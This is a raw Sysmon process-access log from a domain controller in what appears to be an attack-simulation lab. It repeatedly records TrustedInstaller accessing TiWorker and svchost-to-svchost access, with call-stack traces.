13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 